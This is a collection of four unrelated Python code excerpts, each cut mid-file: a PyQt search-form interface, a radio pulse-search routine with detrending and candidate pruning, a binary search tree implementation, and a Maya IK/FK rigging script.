self.locationRangeFilterLbl = QtWidgets.QLabel('Range (KM)')
self.locationRangeFilter = QtWidgets.QLineEdit()
self.searchGeographyLayout.addWidget(self.locationRangeFilterLbl, 2, 1, 1, 1)
self.searchGeographyLayout.addWidget(self.locationRangeFilter, 2, 3, 1, 1)
# Country field
self.countryFilterLbl = QtWidgets.QLabel('Country')
self.countryFilter = QtWidgets.QLineEdit()
self.searchGeographyLayout.addWidget(self.countryFilterLbl, 3, 1, 1, 1)
self.searchGeographyLayout.addWidget(self.countryFilter, 3, 3, 1, 1)
# Set layout to widget
self.searchGeographyWidget.setLayout(self.searchGeographyLayout)
# Return widget
return self.searchGeographyWidget
def generate_search_form_views(self):
# Create layout and widget to place contents in
self.searchViewsLayout = QtWidgets.QGridLayout()
self.searchViewsWidget = QtWidgets.QWidget()
# Create check-boxes
self.mapViewChk = QtWidgets.QCheckBox()
self.mapViewChk.setText('Map')
self.tableViewChk = QtWidgets.QCheckBox()
self.tableViewChk.setText('Table')
self.timelineViewChk = QtWidgets.QCheckBox()
self.timelineViewChk.setText('Feature Analyses')
# Set all to checked by default
self.mapViewChk.setChecked(True)
self.tableViewChk.setChecked(True)
self.timelineViewChk.setChecked(True)
# Add widgets to layout
# self.searchViewsLayout.addWidget(self.tableViewChk, 1, 1, 1, 1)
self.searchViewsLayout.addWidget(self.mapViewChk, 3, 1, 1, 1)
self.searchViewsLayout.addWidget(self.timelineViewChk, 5, 1, 1, 1)
# Set layout to widget
self.searchViewsWidget.setLayout(self.searchViewsLayout)
# Return widget
return self.searchViewsWidget
def generate_search_form_advanced(self):
# Create layout and widget to place contents in
self.searchAdvancedLayout = QtWidgets.QVBoxLayout()
self.searchAdvancedWidget = QtWidgets.QWidget()
# Buttons and labels for adding / removing conditions
self.advancedConditionLbl = QtWidgets.QLabel('Match')
self.matchingPolicyCombo = QtWidgets.QComboBox()
self.matchingPolicyCombo.addItem("ALL")
self.matchingPolicyCombo.addItem("OR")
self.addConditionBtn = QtWidgets.QPushButton('+')
self.removeConditionBtn = QtWidgets.QPushButton('-')
self.searchAdvancedControlsLayout = QtWidgets.QHBoxLayout()
self.searchAdvancedControlsLayout.addWidget(self.advancedConditionLbl)
self.searchAdvancedControlsLayout.addWidget(self.matchingPolicyCombo)
self.searchAdvancedControlsLayout.addWidget(self.addConditionBtn)
self.searchAdvancedControlsLayout.addWidget(self.removeConditionBtn)
self.searchAdvancedControlsWidget = QtWidgets.QWidget()
self.searchAdvancedControlsWidget.setLayout(self.searchAdvancedControlsLayout)
# Layout for adding conditions to
self.advancedSearchLayout = QtWidgets.QGridLayout()
self.advancedSearchWidget = QtWidgets.QWidget()
self.advancedSearchWidget.setLayout(self.advancedSearchLayout)
# Add both widgets to upper layout
self.searchAdvancedLayout.addWidget(self.searchAdvancedControlsWidget)
self.searchAdvancedLayout.addWidget(self.advancedSearchWidget)
self.searchAdvancedLayout.setStretch(0, 1)
self.searchAdvancedLayout.setStretch(1, 20)
# Add signals for communication
self.addConditionBtn.pressed.connect(self.app.searchHandler.add_custom_condition)
self.removeConditionBtn.pressed.connect(self.app.searchHandler.remove_custom_condition)
# Set layout to widget
self.searchAdvancedWidget.setLayout(self.searchAdvancedLayout)
# Return widget
return self.searchAdvancedWidget
def change_proportions(self):
# Account for possibility of default form (with an additional element at the top)
if self.app.searchHandler.view.viewLayout.count() == 4:
offset = 1
else:
offset = 0
if (self.infoWindowWidgets['tableSpan'].value() > 0):
self.topLevelSearchLayout.itemAt(1).widget().layout().setStretch(0+offset, int(self.infoWindowWidgets['tableSpan'].value()))
# Timeline slider
if (self.infoWindowWidgets['timelineSpan'].value() > 0):
self.topLevelSearchLayout.itemAt(1).widget().layout().setStretch(2+offset, int(self.infoWindowWidgets['timelineSpan'].value()))
# Map slider
if (self.infoWindowWidgets['mapSpan'].value() > 0):
self.topLevelSearchLayout.itemAt(1).widget().layout().setStretch(1+offset, int(self.infoWindowWidgets['mapSpan'].value()))
def feature_calma_changed(self, index):
if len(self.tracklistView.selectedIndexes()) > 0:
self.app.searchHandler.view.graph_calma(self.tracklistView.selectedIndexes()[0])
def create_results_view(self):
"""
Creates a properties window for a data view.
Parameters
----------
self : instance
Class instance.
"""
# Create layouts for each tab
layoutTabLayout = QtWidgets.QGridLayout()
searchTabLayout = QtWidgets.QGridLayout()
self.infoWindowWidgets = {}
# Add sliders for adjusting the layout
layoutTabLayout.addWidget(QtWidgets.QLabel('Table Span'), 1, 0)
self.infoWindowWidgets['tableSpan'] = QtWidgets.QSlider(QtCore.Qt.Horizontal)
self.infoWindowWidgets['tableSpan'].setMaximum(10)
self.infoWindowWidgets['tableSpan'].setValue(2)
self.infoWindowWidgets['tableSpan'].setSingleStep(1)
layoutTabLayout.addWidget(self.infoWindowWidgets['tableSpan'], 1, 1)
layoutTabLayout.addWidget(QtWidgets.QLabel('Map Span'), 2, 0)
self.infoWindowWidgets['mapSpan'] = QtWidgets.QSlider(QtCore.Qt.Horizontal)
self.infoWindowWidgets['mapSpan'].setMaximum(10)
self.infoWindowWidgets['mapSpan'].setValue(6)
self.infoWindowWidgets['mapSpan'].setSingleStep(1)
layoutTabLayout.addWidget(self.infoWindowWidgets['mapSpan'], 2, 1)
layoutTabLayout.addWidget(QtWidgets.QLabel('Timeline Span'), 3, 0)
self.infoWindowWidgets['timelineSpan'] = QtWidgets.QSlider(QtCore.Qt.Horizontal)
self.infoWindowWidgets['timelineSpan'].setMaximum(10)
self.infoWindowWidgets['timelineSpan'].setValue(2)
self.infoWindowWidgets['timelineSpan'].setSingleStep(1)
layoutTabLayout.addWidget(self.infoWindowWidgets['timelineSpan'], 3, 1)
self.infoWindowWidgets['tableSpan'].sliderMoved.connect(lambda: self.change_proportions())
self.infoWindowWidgets['mapSpan'].sliderMoved.connect(lambda: self.change_proportions())
self.infoWindowWidgets['timelineSpan'].sliderMoved.connect(lambda: self.change_proportions())
# Add search button
self.infoWindowWidgets['searchButton'] = QtWidgets.QPushButton('Search')
self.infoWindowWidgets['searchBox'] = QtWidgets.QLineEdit()
searchTabLayout.addWidget(self.infoWindowWidgets['searchBox'], 1, 0)
searchTabLayout.addWidget(self.infoWindowWidgets['searchButton'], 1, 1)
searchTabLayout.addWidget(QtWidgets.QWidget(), 1, 2)
searchTabLayout.setRowStretch(0, 1)
searchTabLayout.setRowStretch(1, 12)
searchTabLayout.setRowStretch(2, 12)
# Add save tab
saveTabLayout = QtWidgets.QGridLayout()
self.infoWindowWidgets['saveButton'] = QtWidgets.QPushButton('Save Search')
self.infoWindowWidgets['saveEdit'] = QtWidgets.QLineEdit()
self.infoWindowWidgets['savePlotButton'] = QtWidgets.QPushButton('Save CALMA Plot')
saveTabLayout.addWidget(self.infoWindowWidgets['saveEdit'], 0, 0)
saveTabLayout.addWidget(self.infoWindowWidgets['saveButton'], 0, 1)
saveTabLayout.addWidget(self.infoWindowWidgets['savePlotButton'], 2, 0)
saveTabLayout.addWidget(QtWidgets.QWidget(), 3, 2)
# saveTabLayout.setRowStretch(0, 1)
# saveTabLayout.setRowStretch(1, 12)
# saveTabLayout.setRowStretch(3, 12)
# Create tracklist label for properties sub-window
self.infoWindowWidgets['tracklistLabel'] = QtWidgets.QLabel("Tracklist:")
# Add toggle for swapping between segmentation and key info for properties sub-window
self.infoWindowWidgets['toggleKeysSegments'] = QtWidgets.QComboBox()
self.infoWindowWidgets['toggleKeysSegments'].addItem('Key Changes')
self.infoWindowWidgets['toggleKeysSegments'].addItem('Segmentation')
self.infoWindowWidgets['toggleKeysSegments'].currentIndexChanged.connect(self.feature_calma_changed)
# Create individual tabs
self.tabWidget = QtWidgets.QTabWidget()
self.layoutTab = QtWidgets.QTabWidget()
self.searchTab = QtWidgets.QTabWidget()
self.saveTab = QtWidgets.QTabWidget()
self.propertiesTab = QtWidgets.QTabWidget()
# Add tracklist tab components
self.tracklistView = QtWidgets.QListWidget(self.propertiesTab)
self.tracklistLayout = QtWidgets.QVBoxLayout(self.propertiesTab)
self.tracklistLayout.addWidget(self.infoWindowWidgets['tracklistLabel'])
self.tracklistLayout.addWidget(self.infoWindowWidgets['toggleKeysSegments'])
self.tracklistLayout.addWidget(self.tracklistView)
self.tracklistWidget = QtWidgets.QWidget()
self.tracklistWidget.setLayout(self.tracklistLayout)
# Create properties tab layout
self.propertiesTreeView = application.TreePropertiesView(self.app) # QtWidgets.QTreeView(self.propertiesTab)
self.propertiesTabLayout = QtWidgets.QVBoxLayout(self.propertiesTab)
self.propertiesTabLayout.addWidget(self.propertiesTreeView)
self.propertiesTabLayout.addWidget(self.tracklistWidget)
self.propertiesTab.setLayout(self.propertiesTabLayout)
self.propertiesTreeView.header().hide()
# Set tab layouts
self.layoutTab.setLayout(layoutTabLayout)
self.searchTab.setLayout(searchTabLayout)
self.saveTab.setLayout(saveTabLayout)
# Finally, add tabs to the tab widget
self.tabWidget.addTab(self.propertiesTab, 'Properties')
self.tabWidget.addTab(self.searchTab, 'Filter')
self.tabWidget.addTab(self.layoutTab, 'Layout')
self.tabWidget.addTab(self.saveTab, 'Save')
# Add tooltips
# self.add_tooltips()
return self.tabWidget
class SearchHandler():
def __init__(self, main):
self.main = main
def load_saved_search(self, index):
for s in reversed(self.main.savedSearches):
if index.data() == s[0]:
self.setup_views(['timeline', 'map', 'table'], self.main.sparql.execute_string(s[1]))
self.main.topMenuTabs.setCurrentIndex(2)
return
def add_custom_condition(self):
# Each custom condition consists of groups of 3 widgets
if self.main.searchForm.advancedSearchLayout.count() == 0:
count = 0
else:
count = self.main.searchForm.advancedSearchLayout.count() / 3
# Add to appropriate indexes our new row of widgets
self.main.searchForm.advancedSearchLayout.addWidget(self.generate_field_combo(), count + 1, 1, 1, 2)
self.main.searchForm.advancedSearchLayout.addWidget(self.generate_condition_combo(), count + 1, 2, 1, 3)
self.main.searchForm.advancedSearchLayout.addWidget(QtWidgets.QLineEdit(), count + 1, 4, 1, 2)
# Add auto-completion where appropriate
self.update_auto_complete()
def remove_custom_condition(self):
if self.main.searchForm.advancedSearchLayout.count() > 0:
# Get 3 last items in the layout and remove them
self.main.searchForm.advancedSearchLayout.itemAt(self.main.searchForm.advancedSearchLayout.count() | |
length in detrendlens
roundN = N/detrendlen * detrendlen
numchunks = roundN / chunklen
# Read in the file
print 'Reading "%s"...'%filenm
timeseries = Num.fromfile(filenm, dtype=Num.float32, count=roundN)
# Split the timeseries into chunks for detrending
numblocks = roundN/detrendlen
timeseries.shape = (numblocks, detrendlen)
stds = Num.zeros(numblocks, dtype=Num.float64)
stds_orig = Num.zeros(numblocks, dtype=Num.float64)
means = Num.zeros(numblocks, dtype=Num.float64)
# de-trend the data one chunk at a time
print ' De-trending the data and computing statistics...'
for ii, chunk in enumerate(timeseries):
if opts.fast: # use median removal instead of detrending (2x speedup)
tmpchunk = chunk.copy()
tmpchunk.sort()
med = tmpchunk[detrendlen/2]
chunk -= med
tmpchunk -= med
elif opts.iter:
# ot,tsig,tmean=plsr.threshold(chunk, 3.0)
tmean,tsig=clean_timeseries(chunk,nabove=10.0,debug=False)
chunk -= tmean
tmpchunk = chunk.copy()
else:
# The detrend calls are the most expensive in the program
timeseries[ii] = scipy.signal.detrend(chunk, type='linear')
tmpchunk = timeseries[ii].copy()
tmpchunk.sort()
# The following gets rid of (hopefully) most of the
# outlying values (i.e. power dropouts and single pulses)
# If you throw out 5% (2.5% at bottom and 2.5% at top)
# of random gaussian deviates, the measured stdev is ~0.871
# of the true stdev. Thus the 1.0/0.871=1.148 correction below.
# The following is roughly .std() since we already removed the median
stds[ii] = Num.sqrt((tmpchunk[detrendlen/40:-detrendlen/40]**2.0).sum() /
(0.95*detrendlen))
if opts.iter:
means[ii] = tmean
stds_orig[ii] = tsig
else:
means[ii]=0.0
stds_orig[ii] = stds[ii]
if opts.noflag:
median_stds = Num.nanmedian(stds_orig)
std_stds = hist_sigma(stds_orig) # stddev of stddevs of chunks
lo_std = max(median_stds - 3.1*std_stds, 0)
hi_std = median_stds + 10.0*std_stds
all_bad = Num.where((stds_orig <= lo_std) | (stds_orig > hi_std))[0]
lo_bad = Num.where(stds_orig <= lo_std)[0]
bad_blocks=all_bad
# bad_blocks=lo_bad
bad_blocks=flag_last_chunk(bad_blocks, detrendlen, chunklen)
else:
# Determine a list of "bad" chunks. We will not search these.
# LGS: If --noflag option is given, will only ignore blocks with low std
# (this nicely flags padding at end of time series)
# Otherwise it will flag both anomolously high and lo blocks (default)
# Blocks with anomoulously high or low stds will have their std replaced
# with the median value
stds *= 1.148
# sort the standard deviations and separate those with
# very low or very high values
sort_stds = stds.copy()
sort_stds.sort()
# identify the differences with the larges values (this
# will split off the chunks with very low and very high stds
locut = (sort_stds[1:numblocks/2+1] -
sort_stds[:numblocks/2]).argmax() + 1
hicut = (sort_stds[numblocks/2+1:] -
sort_stds[numblocks/2:-1]).argmax() + numblocks/2 - 2
std_stds = scipy.std(sort_stds[locut:hicut])
median_stds = sort_stds[(locut+hicut)/2]
lo_std = median_stds - 4.0 * std_stds
hi_std = median_stds + 4.0 * std_stds
bad_blocks = Num.nonzero((stds < lo_std) | (stds > hi_std))[0]
print " pseudo-median block standard deviation = %.2f" % (median_stds)
print " identified %d bad blocks out of %d (i.e. %.2f%%)" % \
(len(bad_blocks), len(stds),
100.0*float(len(bad_blocks))/float(len(stds)))
print " High and low stds: %.2f %.2f" % (hi_std, lo_std)
print " Downsample factor: %d " % dsfact
print " Now searching..."
print bad_blocks
stds[bad_blocks] = median_stds
# Now normalize all of the data and reshape it to 1-D
if opts.iter:
timeseries /= stds_orig[:,Num.newaxis]
else:
timeseries /= stds[:,Num.newaxis]
timeseries.shape = (roundN,)
# And set the data in the bad blocks to zeros
# Even though we don't search these parts, it is important
# because of the overlaps for the convolutions
for bad_block in bad_blocks:
loind, hiind = bad_block*detrendlen, (bad_block+1)*detrendlen
timeseries[loind:hiind] = 0.0
# Convert to a set for faster lookups below
bad_blocks = set(bad_blocks)
# Step through the data
dm_candlist = []
if opts.doclust: cand_clust = []
for chunknum in range(numchunks):
loind = chunknum*chunklen-overlap
hiind = (chunknum+1)*chunklen+overlap
# Take care of beginning and end of file overlap issues
if (chunknum==0): # Beginning of file
chunk = Num.zeros(worklen, dtype=Num.float32)
chunk[overlap:] = timeseries[loind+overlap:hiind]
elif (chunknum==numchunks-1): # end of the timeseries
chunk = Num.zeros(worklen, dtype=Num.float32)
chunk[:-overlap] = timeseries[loind:hiind-overlap]
else:
chunk = timeseries[loind:hiind]
# Make a set with the current block numbers
lowblock = blocks_per_chunk * chunknum
currentblocks = set(Num.arange(blocks_per_chunk) + lowblock)
localgoodblocks = Num.asarray(list(currentblocks -
bad_blocks)) - lowblock
# Search this chunk if it is not all bad
if len(localgoodblocks):
# This is the good part of the data (end effects removed)
goodchunk = chunk[overlap:-overlap]
# need to pass blocks/chunklen, localgoodblocks
# dm_candlist, dt, opts.threshold to cython routine
# Search non-downsampled data first
# NOTE: these nonzero() calls are some of the most
# expensive calls in the program. Best bet would
# probably be to simply iterate over the goodchunk
# in C and append to the candlist there.
hibins = Num.flatnonzero(goodchunk>opts.threshold)
hivals = goodchunk[hibins]
hibloc = Num.copy(hibins)
hibins += chunknum * chunklen
hiblocks = hibins/detrendlen
# Add the candidates (which are sorted by bin)
for bin, val, block in zip(hibins, hivals, hiblocks):
if block not in bad_blocks:
time = bin * dt
dm_candlist.append(candidate(info.DM, val, time, bin, 1, \
block, stds_orig[block], means[block]))
#Perform cluster algorithm
if opts.doclust and len(hibloc) != 0:
nsamp,smax,amax,smean,amean,wgp,sctr=plsr.cluster(goodchunk, hibloc, nbin=opts.maxgap)
amean=Num.sqrt(nsamp)*amean
smax += chunknum*chunklen
smean += chunknum*chunklen
sctr += chunknum*chunklen
tmax,tmean,tctr = smax*dt, smean*dt, sctr*dt
for ii in range(len(nsamp)):
tmpblk=int(sctr[ii])/detrendlen
if tmpblk in bad_blocks: continue
cand_clust.append(clust_cand(info.DM, amax[ii], tmax[ii], smax[ii],\
nsamp[ii], tmpblk, stds_orig[tmpblk], means[tmpblk], amean[ii], \
tmean[ii], smean[ii], tctr[ii], sctr[ii], wgp[ii]))
# Prepare our data for the convolution
if useffts: fftd_chunk = rfft(chunk, -1)
# Now do the downsampling...
for ii, downfact in enumerate(downfacts):
if useffts:
# Note: FFT convolution is faster for _all_ downfacts, even 2
goodchunk = fft_convolve(fftd_chunk, fftd_kerns[ii],
overlap, -overlap)
else:
# The normalization of this kernel keeps the post-smoothing RMS = 1
kernel = Num.ones(downfact, dtype=Num.float32) / \
Num.sqrt(downfact)
smoothed_chunk = scipy.signal.convolve(chunk, kernel, 1)
goodchunk = smoothed_chunk[overlap:-overlap]
#Calculate a cleaned std dev of the convolved timeseries
#Note: sig=4.0 -> prob. of 1 in ~16000
loc_std=clean_stddev(goodchunk, 4.0, verbose=False)
if loc_std==0.0: loc_std=1000.0
goodchunk/=loc_std
hibins = Num.flatnonzero(goodchunk>opts.threshold)
hivals = goodchunk[hibins]
hibins += chunknum * chunklen
hiblocks = hibins/detrendlen
hibtmp = hibins - chunknum*chunklen
hibins = hibins.tolist()
hivals = hivals.tolist()
hibtmp = hibtmp.tolist()
# Now walk through the new candidates and remove those
# that are not the highest but are within downfact/2
# bins of a higher signal pulse
## hibins, hivals = prune_related1(hibins, hivals, downfact)
hibins, hivals = prune_related3(goodchunk, hibtmp, downfact)
hibins += chunknum*chunklen
hiblocks = Num.array(hibins)/detrendlen
hiblocks = hiblocks.astype('int')
# Insert the new candidates into the candlist, but
# keep it sorted...
for bin, val, block in zip(hibins, hivals, hiblocks):
if block not in bad_blocks:
time=bin * dt
bisect.insort(dm_candlist,
candidate(info.DM, val, time, bin, downfact, \
block, stds_orig[block], means[block]))
# Now walk through the dm_candlist and remove the ones that
# are within the downsample proximity of a higher
# signal-to-noise pulse
dm_candlist = prune_related2(dm_candlist, downfacts)
print " Found %d pulse candidates"%len(dm_candlist)
# Get rid of those near padding regions
if info.breaks: prune_border_cases(dm_candlist, offregions)
# Write the pulses to an ASCII output file
if len(dm_candlist):
#dm_candlist.sort(cmp_sigma)
outfile.write("# DM Sigma Time (s) Sample Downfact Block RMS Mean\n")
for cand in dm_candlist:
cand.bin=cand.bin*dsfact
outfile.write(str(cand))
outfile.close()
#Write out cluster results
if opts.doclust and len(cand_clust):
outclust.write("# DM SNRmean TimeCtr SampNumCtr Width "+ \
"Block RMS Mean SNRMax TimeMax " + \
"SampNumMax TimeMean SampNumMean NumSamp\n")
for cand in cand_clust:
cand.bin*=dsfact
cand.bin_mean*=dsfact
cand.bin_ctr*=dsfact
outclust.write(str(cand))
if opts.doclust: outclust.close()
# Add these candidates to the overall candidate list
for cand in dm_candlist:
candlist.append(cand)
num_v_DMstr[DMstr] = len(dm_candlist)
if (opts.makeplot):
# Step through the candidates to make a SNR list
DMs.sort()
snrs = []
for cand in candlist:
snrs.append(cand.sigma)
if snrs:
maxsnr = max(int(max(snrs)), int(opts.threshold)) + 3
else:
maxsnr = int(opts.threshold) + 3
# Generate the SNR histogram
snrs = Num.asarray(snrs)
(num_v_snr, lo_snr, d_snr, num_out_of_range) = \
scipy.stats.histogram(snrs,
int(maxsnr-opts.threshold+1),
[opts.threshold, maxsnr])
snrs = Num.arange(maxsnr-opts.threshold+1, dtype=Num.float64) * d_snr \
+ lo_snr + 0.5*d_snr
num_v_snr = num_v_snr.astype(Num.float32)
num_v_snr[num_v_snr==0.0] = 0.001
# Generate the DM histogram
num_v_DM = Num.zeros(len(DMs))
for ii, DM in enumerate(DMs):
num_v_DM[ii] = num_v_DMstr["%.2f"%DM]
DMs = Num.asarray(DMs)
# open the plot device
short_filenmbase = filenmbase[:filenmbase.find("_DM")]
if opts.T_end > obstime:
opts.T_end = obstime
if pgplot_device:
ppgplot.pgopen(pgplot_device)
else:
if (opts.T_start > | |
"""
@author: <NAME>
@since: 21/08/2016
@modified:
A BST implementation supporting
- insert = O(h)
- remove = O(h)
- look up = O(h)
- get min = O(h)
- get max = O(h)
assuming left < key =< right
Time Complexity:
- best case, avg case = O(log n) as in inserting, removing, looking up, finding min/max we needed to traverse the tree
down until (except if remove root but then will need to find min of right subtree and change pointers)
- worst case = O(n) when each item inserted is > than last, leads to a long chain
Height = O(h)
- worst = O(n), just a big chain on one side
- best, avg = O(log n)
expected depth of any individual node is O(log n)
Space Complexity: O(n), where n is the number of nodes
Traversals:
- pre-order = root, Left, Right
- in-order = Left, root, Right
- post-order = Left, Right, root
level first = BFS
traversal example:
F
/ \
B G
/ \ \
A D I
/ \ /
C E H
pre-order (r,L,R) = F, B, A, D, C, E, G, I, H
in-order (L,r,R) = A, B, C, D, E, F, G, H, I
post-order (L,R,r) = A, C, E, D, B, H, I, G, F
Note: Better than linear time, worse than hashtables
- we use BST to get better performance than O(n) (linked lists etc can also do O(n)
- but in the worst case they are also O(n) --> then comes AVL trees =]
"""
from algorithms_datastructures.trees.tree_node import TreeNode
class BinarySearchTree:
def __init__(self):
self.root = None
def is_empty(self):
return self.root == None
def insert(self, key):
"""specify the value of the key for the new node
will create node for you and call auxiliary function to recursively find where the
new node belongs"""
new_node = TreeNode(key)
if self.is_empty(): # make root point to the head of the tree (new node)
self.root = new_node
else:
self._insert_aux(self.root, new_node)
def _insert_aux(self, current_node, new_node):
if new_node.key < current_node.key: # check if new node lies to the left
if current_node.left is not None: # if None, we found where to put it
self._insert_aux(current_node.left, new_node) # else recursively find where to put
else:
current_node.left = new_node
else: # new node lies to the right
if current_node.right is not None:
self._insert_aux(current_node.right, new_node)
else:
current_node.right = new_node
def get_min(self, start_node=None):
if not self.is_empty():
if start_node:
current_node = start_node # can specify a start node to search on a particular part of the tree
else:
current_node = self.root
while current_node.left is not None:
current_node = current_node.left
return current_node
else:
raise Exception
def get_max(self, start_node=None):
if not self.is_empty():
if start_node:
current_node = start_node
else:
current_node = self.root
while current_node.right is not None:
current_node = current_node.right
return current_node
else:
raise Exception
def look_up(self, key):
"""Recursively searches if key is in the tree, returns False if not"""
if self.is_empty():
raise Exception
return self._look_up_aux_rec(self.root, key)
def _look_up_aux_rec(self, current_node, key, parent=None): # returns parent as well now, less initiative as iterative
if key < current_node.key:
if current_node.left is not None:
parent = current_node
return self._look_up_aux_rec(current_node.left, key, parent)
else:
return False, parent
elif key > current_node.key:
if current_node.right is not None:
parent = current_node
return self._look_up_aux_rec(current_node.right, key, parent)
else:
return False, parent
else: # current_node.key = key
return current_node, parent
def _look_up_aux_itr(self, key):
"""Alternative look up that returns the parent of the
node (if the node is in the tree) as well"""
if self.is_empty():
raise Exception
current_node = self.root # start at root with parent = None
parent = None
while current_node is not None:
if key < current_node.key: # search left
if current_node.left is not None: # iff left is not None
parent = current_node # update parent node to current node
current_node = current_node.left # update current node to the left link
else:
raise Exception ('Key not in tree, key: ' + str(key))
#return False, parent # left is None, item not found, return False, parent
elif key > current_node.key: # search right
if current_node.right is not None: # iff right is not None
parent = current_node # update parent to current node
current_node = current_node.right # update current node to right link
else:
raise Exception ('Key not in tree, key: ' + str(key))
#return False, parent # right is None, item not found, return False, parent
else: # current_node.key == key
return current_node, parent # found, return current node, parent
def remove(self, key):
"""Remove a node with value key from the tree
cases:
1. node is a leaf, just get rid of it (easy)
2. node has 1 child, make child go directly to parent of node, will maintain BST ordering (easy)
3. node has 2 children, harder. Using the BST property, take the left child (grandchild) of the right child
"""
remove_node, parent = self._look_up_aux_rec(self.root, key)
if remove_node: # check for key in tree
self._remove_aux(remove_node, parent)
else: # node to remove not in BST
raise Exception ('node to remove (' + str(key) + ') not in BST')
def _remove_aux(self, remove_node, parent):
"""
removes remove_node
:param remove_node: node to remove
:param parent: parent of node to remove
:return:
"""
# if parent = None, we are trying to remove the root, can be done better but I forgot about boundary cases and
# did this quick fix l0ls
if parent == None:
if self.root.left is None and self.root.right is None:
self.root = None # set to None, we are done
elif self.root.left is not None and self.root.right is None: # 1 child, the left one
self.root = self.root.left # make it point to the left child
elif self.root.left is None and self.root.right is not None: # 1 child, the right one
self.root = self.root.right # make it point to the right child
else: # 2 children
smallest_node_right_subtree = self.get_min(remove_node.right)
remove_node.key = smallest_node_right_subtree.key # copy the value over, then remove the smallest val
parent = remove_node
current = remove_node.right
while current.left is not None: # find parent of smallest_node_right_subtree
parent = current
current = current.left
self._remove_aux(current, parent)
# else we are not looking to remove the root
else:
# case 1: leaf
if remove_node.left is None and remove_node.right is None: # case 1: leaf
if parent.left == remove_node: # to remove just reset parent link
parent.left = None
elif parent.right == remove_node:
parent.right = None
else:
raise Exception ('custom msg here')
# case 2: 1 child # case 2: 1 child
# skip over the node to be removed by assigning the parent pointer to the left/right pointer of removed node
elif remove_node.left is not None and remove_node.right is None: # only has a left child
# need to see if we add it to parent.left or .right
if parent.key > remove_node.key: # parent > so add to .left
parent.left = remove_node.left # parent.left -> (skipped removed) --> removed.left
else: # parent <= so add to .right
parent.right = remove_node.left # parent.right -> (skipped removed) --> removed.right
elif remove_node.left is None and remove_node.right is not None: # only has a right child
# need to see if we add it to parent.left or .right
if parent.key > remove_node.key: # parent > so add to .left
parent.left = remove_node.right
else: # parent <= so add to .right
parent.right = remove_node.right
# case 3: 2 children
elif remove_node.left is not None and remove_node.right is not None: # case 3: 2 children
# find the smallest element in the right subtree and swap that value with node to remove value
# 2 children guarantees there is something in the right subtree so there will be a minimum
# this min will either be the immediate right value or left most value in right subtree
# to find the smallest element we can call get min on the node to remove to search that subtree
smallest_node_right_subtree = self.get_min(remove_node.right)
# swapping this | |
<reponame>ssimbox/ssimbox-rigTools
from ctrlUI_lib import createClav2, createSphere
import maya.cmds as cmds
import maya.OpenMaya as om
from functools import partial
def duplicateChain(*args):
global ogChain
global chainLen
global switcherLoc
global side
global controllerColor
global clavCheckbox
global rigGrp, ctrlGrp
ogRootchain = cmds.ls(sl = True, type = "joint")[0]
ogChain = cmds.listRelatives(ogRootchain, ad = True, type = "joint")
ogChain.append(ogRootchain)
ogChain.reverse()
side = ogRootchain[0:2]
# Initialize input from UI
scaleController = cmds.intField(scaleField_UI, q=1, v=1)
blendCheckbox = cmds.checkBox(blendCheckbox_UI, q=1, v=1)
constraintCheckBox = cmds.checkBox(constraintCheckBox_UI, q=1, v=1)
chainMenu = cmds.optionMenu("chainMenu_UI", q=1, v=1)
clavCheckbox = cmds.checkBox(clavCheckbox_UI, q=1, v=0)
if side == "l_": controllerColor = rgb=(0, 0, 255)
elif side == "r_": controllerColor = rgb=(255, 0, 0)
if chainMenu == "Leg": chainLen = 5
else: #this is totally unscalable but for now it's ok
chainLen = 3
#suffix for the new chains
newJointList = ["_ik", "_fk", "_scale"]
for newJoint in newJointList:
for i in range(chainLen):
if blendCheckbox == 0 and constraintCheckBox == 0:
cmds.error("pls, select one relation type")
break
newJointName = ogChain[i] + newJoint
#create a joint, copy their position and freeze transform
cmds.joint(n = newJointName)
cmds.matchTransform(newJointName, ogChain[i])
cmds.makeIdentity(newJointName, a = 1, t = 0, r = 1, s = 0)
#deselect to make the two different hierarchies
cmds.select(cl = 1)
cmds.parent((ogChain[0] + "_ik"), world = True)
cmds.setAttr(ogChain[0] + "_ik.visibility", 0)
cmds.setAttr(ogChain[0] + "_fk.visibility", 0)
# Create a locator used for switching IK/FK mode and snap it between two joints
switcherLoc = cmds.spaceLocator(n=side + chainMenu + "_ikfk_Switch")
switcherLocGrp = cmds.group(em=1, n=switcherLoc[0] + "_grp")
cmds.color(switcherLoc, rgb=(255, 255, 0)) #yellow
cmds.delete(cmds.pointConstraint(switcherLoc, switcherLocGrp))
cmds.parent(switcherLoc, switcherLocGrp)
cmds.delete(cmds.pointConstraint(ogChain[1], ogChain[2], switcherLocGrp))
cmds.addAttr(switcherLoc, ln="FKIK_Mode", at="short", min=0, max=1, k=1, r=1)
cmds.move(0,0,-12, switcherLocGrp, r=1) #IMPROVE THIS SHIT
cmds.parentConstraint(ogChain[1], switcherLocGrp, mo=1)
#remove .t, .r, .s and .v from the channelbox
for coord in ["X", "Y", "Z"]:
cmds.setAttr(switcherLoc[0] + ".translate" + coord, k=0, l=1)
cmds.setAttr(switcherLoc[0] + ".rotate" + coord, k=0, l=1)
cmds.setAttr(switcherLoc[0] + ".scale" + coord, k=0, l=1)
cmds.setAttr(switcherLoc[0] + ".visibility", k=0, l=1)
# Create hierarchy groups
rigGrp = cmds.group(em=1, n= side + chainMenu + "_rig_grp")
ctrlGrp = cmds.group(em=1, n= side + chainMenu + "_ctrl_grp")
cmds.delete(cmds.parentConstraint(ogChain[0], rigGrp))
cmds.delete(cmds.parentConstraint(ogChain[0], ctrlGrp))
cmds.parent(ctrlGrp, rigGrp)
# Execute
if blendCheckbox == 1:
blendNodeFunc(scaleController, chainMenu)
if constraintCheckBox == 1:
constraintFunc(scaleController, chainMenu)
if clavCheckbox == 1:
clavSel(scaleController)
else:
cmds.parent(ogChain[0] + "_ik", ogChain[0] + "_fk", ctrlGrp)
cmds.parent(ogChain[0] + "_fk_anim_grp", ctrlGrp)
cmds.parent(switcherLocGrp, rigGrp)
def clavSel(scaleClav):
# Select clavicle Joint moving up and put it at the top of the chain
clavJoint = cmds.pickWalk(ogChain[0], d="up")[0]
#ogChain.insert(0, clavJoint)
clavController = createClav2(clavJoint + "_anim") # Import coordinates from ctrlUI_lib
cmds.delete(cmds.pointConstraint(clavJoint, clavController))
# Create offset group, FDH and move up
clavControllerGrp = cmds.group(n=clavController + "_grp", em=1)
cmds.delete(cmds.parentConstraint(clavJoint, clavControllerGrp))
cmds.parent(clavController, clavControllerGrp)
fixedScale = scaleClav/4
cmds.scale(fixedScale, fixedScale, fixedScale, clavController)
cmds.makeIdentity(clavController, a=1)
cmds.move(0,10,0, clavControllerGrp, ws=1, r=1)
cmds.color(clavController, rgb=controllerColor)
